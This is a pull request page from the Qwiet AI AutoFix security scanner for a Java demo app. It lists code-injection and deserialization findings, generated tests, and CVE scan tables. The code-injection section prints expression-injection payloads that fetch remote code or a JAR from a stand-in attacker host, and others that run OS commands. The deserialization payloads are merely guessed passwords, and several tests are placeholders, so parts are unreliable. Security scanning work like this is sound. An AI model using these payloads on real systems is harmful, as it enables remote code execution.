AutoFix PR #5

Closed
wants to merge 2 commits into from
Conversation

heyandyj
Owner

@heyandyj heyandyj commented Jan 24, 2025

Qwiet AI AutoFix

This PR was created automatically by the Qwiet AI AutoFix tool.
As long as it is open, subsequent scans and generated fixes to this same branch will be added to it as new commits.

Each commit fixes one vulnerability.

Some manual intervention might be required before merging this PR.

Project Information

Findings/Vulnerabilities Fixed

Finding 13: Remote Code Execution: Code Injection Through Attacker-controlled Data via foo in SearchController.doGetSearch

Commits/Files Changed
Details
Vulnerability Description

Attacker-controlled data is used in a code execution context without undergoing escaping or validation. This indicates a remote code execution vulnerability.

  • Severity: critical

  • CVSS Score: 9 (critical)

  • CWE: CWE-77: Remote Code Execution

Attack Payloads
[
1. "${(new java.net.URL(\"http://attacker-website.com/malicious-script.jsp\")).openConnection().getInputStream().read()}"
2. "${new java.lang.ProcessBuilder('whoami').redirectErrorStream(true).start().getText()}"
3. "${new java.util.jar.URLClassLoader(['http://attacker-website.com/malicious.jar']).loadClass('MaliciousClass').newInstance().execute()}"
4. "${new org.springframework.core.io.UrlResource('http://attacker-website.com/malicious.txt').getInputStream().read()}"
5. "${new java.lang.Runtime().exec('whoami').getText()}"
]
Testcases
import static org.junit.Assert.assertFalse;
import static org.junit.Assert.assertTrue;
import static org.mockito.Mockito.mock;

import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

import org.junit.Test;

@Test
public void testDoGetSearch_WithValidPayload() throws Exception {
    SearchController controller = new SearchController();
    // Mocked servlet objects; the doGetSearch(String, HttpServletResponse, HttpServletRequest) signature is taken from the call below
    HttpServletResponse response = mock(HttpServletResponse.class);
    HttpServletRequest request = mock(HttpServletRequest.class);

    String result = controller.doGetSearch("${new java.lang.ProcessBuilder('whoami').redirectErrorStream(true).start().getText()}", response, request);

    assertTrue(result.contains("root")); // This test case assumes the system user is 'root'. Adjust accordingly.
}

@Test
public void testDoGetSearch_WithInvalidPayload() throws Exception {
    SearchController controller = new SearchController();
    HttpServletResponse response = mock(HttpServletResponse.class);
    HttpServletRequest request = mock(HttpServletRequest.class);

    String result = controller.doGetSearch("${invalid}", response, request);

    assertFalse(result.contains("root")); // This test case assumes the system user is not 'root'. Adjust accordingly.
}

Please note that these test cases are simplified examples and may not cover all possible scenarios. Actual test cases would depend on the specific requirements and constraints of the application.

Finding 18: Deserialization: Attacker-controlled Data Used in Unsafe Deserialization Function via auth in AdminController.doPostLogin

Commits/Files Changed
Details
Vulnerability Description

Attacker-controlled data is deserialized. This indicates an insecure deserialization vulnerability.

  • Severity: critical

  • CVSS Score: 8 (critical)

  • CWE: CWE-502: Deserialization

Attack Payloads
[
1. Password=shiftleftsecret
2. Password=admin
3. Password=123456
4. Password=qwerty
5. Password=password
]
Testcases

Here are five test cases that simulate different scenarios:

import static org.junit.Assert.assertFalse;
import static org.junit.Assert.assertTrue;

import org.junit.Test;

// isAdmin(String) is the method these tests exercise; it is assumed to be reachable from the
// test class (for example via a static import or as a method of the class under test).

@Test
public void testIsAdminWithValidAdminCookie() throws Exception {
    String validAdminCookie = "..."; // Replace with a valid admin cookie
    assertTrue(isAdmin(validAdminCookie));
}

@Test
public void testIsAdminWithValidNonAdminCookie() throws Exception {
    String validNonAdminCookie = "..."; // Replace with a valid non-admin cookie
    assertFalse(isAdmin(validNonAdminCookie));
}

@Test
public void testIsAdminWithInvalidCookie() throws Exception {
    String invalidCookie = "..."; // Replace with an invalid cookie
    assertFalse(isAdmin(invalidCookie));
}

@Test
public void testIsAdminWithNullCookie() throws Exception {
    assertFalse(isAdmin(null));
}

@Test
public void testIsAdminWithEmptyCookie() throws Exception {
    assertFalse(isAdmin(""));
}

Please replace the placeholders with actual values to create valid test cases.

Qwiet

Checking analysis of application shiftleft-java-demo against 3 build rules.

Using sl version 0.9.2978 (cd6c3e57653597d8de7843297b46b0bfd6563ae4).

Checking findings on scan 1.

Results per rule:

  • Allow no critical findings: FAIL
    (52 matched vulnerabilities; configured threshold is 0).

    First 5 findings:

        ID   CVSS    Rating    CVE              Title                                                                                                                                                     
     161   10.0   critical   CVE-2018-14721   FasterXML jackson-databind 2.x before 2.9.7 might allow remote attackers to conduct server-side request forgery (SSRF) attacks by leveraging failure to b…
     406   10.0   critical   GMS-2022-558     Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in org.springframework:spring-beans.                           
     439   10.0   critical   GMS-2022-559     Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in org.springframework:spring-core.                            
     452   10.0   critical   GMS-2022-560     Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in org.springframework.boot:spring-boot-starter-web.           
      90    9.8   critical   CVE-2017-5929    QOS.ch Logback before 1.2.0 has a serialization vulnerability affecting the SocketServer and ServerSocketReceiver components. The RemoteStreamAppenderCli…
     Severity rating   Count 
     Critical             52 
     High                  0 
     Medium                0 
     Low                   0 
     Finding Type   Count 
     Oss_vuln          43 
     Container          7 
     Vuln               2 
  • Allow one OSS or container finding: FAIL
    (267 matched vulnerabilities; configured threshold is 1).

    First 5 findings:

        ID   CVSS    Rating    CVE              Title                                                                                                                                                     
     161   10.0   critical   CVE-2018-14721   FasterXML jackson-databind 2.x before 2.9.7 might allow remote attackers to conduct server-side request forgery (SSRF) attacks by leveraging failure to b…
     406   10.0   critical   GMS-2022-558     Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in org.springframework:spring-beans.                           
     439   10.0   critical   GMS-2022-559     Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in org.springframework:spring-core.                            
     452   10.0   critical   GMS-2022-560     Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in org.springframework.boot:spring-boot-starter-web.           
      90    9.8   critical   CVE-2017-5929    QOS.ch Logback before 1.2.0 has a serialization vulnerability affecting the SocketServer and ServerSocketReceiver components. The RemoteStreamAppenderCli…
     Severity rating   Count 
     Critical             50 
     High                133 
     Medium               79 
     Low                   5 
     Finding Type   Count 
     Oss_vuln         200 
     Container         67 
  • Allow no reachable OSS vulnerability: FAIL
    (76 matched vulnerabilities; configured threshold is 0).

    First 5 findings:

        ID   CVSS    Rating    CVE             Title                                                                                                                                                      
     439   10.0   critical   GMS-2022-559    Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in org.springframework:spring-core.                             
     346    9.8   critical   CVE-2020-1938   When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as havin…
     360    9.8   critical   CVE-2017-5651   In Apache Tomcat 9.0.0.M1 to 9.0.0.M18 and 8.5.0 to 8.5.12, the refactoring of the HTTP connectors introduced a regression in the send file processing. If…
     365    9.8   critical   CVE-2018-8014   The defaults settings for the CORS filter provided in Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure…
     432    9.8   critical   CVE-2018-1270   Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to expose STOMP over Web…
     Severity rating   Count 
     Critical              8 
     High                 35 
     Medium               32 
     Low                   1 

3 rules failed.

Qwiet

Checking analysis of application shiftleft-java-demo against 3 build rules.

Using sl version 0.9.2978 (cd6c3e57653597d8de7843297b46b0bfd6563ae4).

Checking findings on scan 1.

Results per rule:

  • Allow no critical findings: FAIL
    (52 matched vulnerabilities; configured threshold is 0).

    First 5 findings:

        ID   CVSS    Rating    CVE              Title                                                                                                                                                     
     178   10.0   critical   CVE-2018-14721   FasterXML jackson-databind 2.x before 2.9.7 might allow remote attackers to conduct server-side request forgery (SSRF) attacks by leveraging failure to b…
     403   10.0   critical   GMS-2022-558     Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in org.springframework:spring-beans.                           
     436   10.0   critical   GMS-2022-559     Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in org.springframework:spring-core.                            
     449   10.0   critical   GMS-2022-560     Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in org.springframework.boot:spring-boot-starter-web.           
      85    9.8   critical   CVE-2017-5929    QOS.ch Logback before 1.2.0 has a serialization vulnerability affecting the SocketServer and ServerSocketReceiver components. The RemoteStreamAppenderCli…
     Severity rating   Count 
     Critical             52 
     High                  0 
     Medium                0 
     Low                   0 
     Finding Type   Count 
     Oss_vuln          43 
     Container          7 
     Vuln               2 
  • Allow one OSS or container finding: FAIL
    (267 matched vulnerabilities; configured threshold is 1).

    First 5 findings:

        ID   CVSS    Rating    CVE              Title                                                                                                                                                     
     178   10.0   critical   CVE-2018-14721   FasterXML jackson-databind 2.x before 2.9.7 might allow remote attackers to conduct server-side request forgery (SSRF) attacks by leveraging failure to b…
     403   10.0   critical   GMS-2022-558     Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in org.springframework:spring-beans.                           
     436   10.0   critical   GMS-2022-559     Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in org.springframework:spring-core.                            
     449   10.0   critical   GMS-2022-560     Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in org.springframework.boot:spring-boot-starter-web.           
      85    9.8   critical   CVE-2017-5929    QOS.ch Logback before 1.2.0 has a serialization vulnerability affecting the SocketServer and ServerSocketReceiver components. The RemoteStreamAppenderCli…
     Severity rating   Count 
     Critical             50 
     High                133 
     Medium               79 
     Low                   5 
     Finding Type   Count 
     Oss_vuln         200 
     Container         67 
  • Allow no reachable OSS vulnerability: FAIL
    (76 matched vulnerabilities; configured threshold is 0).

    First 5 findings:

        ID   CVSS    Rating    CVE             Title                                                                                                                                                      
     436   10.0   critical   GMS-2022-559    Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in org.springframework:spring-core.                             
     343    9.8   critical   CVE-2020-1938   When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as havin…
     357    9.8   critical   CVE-2017-5651   In Apache Tomcat 9.0.0.M1 to 9.0.0.M18 and 8.5.0 to 8.5.12, the refactoring of the HTTP connectors introduced a regression in the send file processing. If…
     362    9.8   critical   CVE-2018-8014   The defaults settings for the CORS filter provided in Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure…
     429    9.8   critical   CVE-2018-1270   Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to expose STOMP over Web…
     Severity rating   Count 
     Critical              8 
     High                 35 
     Medium               32 
     Low                   1 

3 rules failed.

@heyandyj heyandyj closed this Jan 24, 2025
@heyandyj heyandyj deleted the qwietai/autofix/fix0002 branch January 24, 2025 23:33